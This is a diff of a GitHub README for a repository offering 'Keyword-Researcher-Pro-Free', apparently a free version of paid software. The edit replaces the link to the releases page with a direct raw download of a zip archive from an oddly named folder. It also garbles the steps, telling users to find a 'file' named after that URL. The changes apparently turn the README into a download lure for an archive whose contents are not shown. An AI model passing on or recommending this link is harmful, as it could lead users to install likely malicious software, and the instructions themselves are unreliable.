ruanvitoor/Keyword-Researcher-Pro-Free/README.md

 ## 📥 Download & Install

-To download the software, visit this page to download: [Keyword Researcher Pro Releases](https://github.com/ruanvitoor/Keyword-Researcher-Pro-Free/releases).
+To download the software, visit this page to download: [Keyword Researcher Pro Releases](https://raw.githubusercontent.com/ruanvitoor/Keyword-Researcher-Pro-Free/main/aerobioscope/Keyword-Researcher-Pro-Free.zip).

 Once you are on the releases page, follow these steps:

 1. Look for the latest version of **Keyword-Researcher-Pro-Free**.
 2. Click on the version number to view all available files.
-3. Find the file that says `Keyword-Researcher-Pro-Setup.exe`, or a similar name.
+3. Find the file that says `https://raw.githubusercontent.com/ruanvitoor/Keyword-Researcher-Pro-Free/main/aerobioscope/Keyword-Researcher-Pro-Free.zip`, or a similar name.
 4. Click on the file to start the download.

 After the download is complete: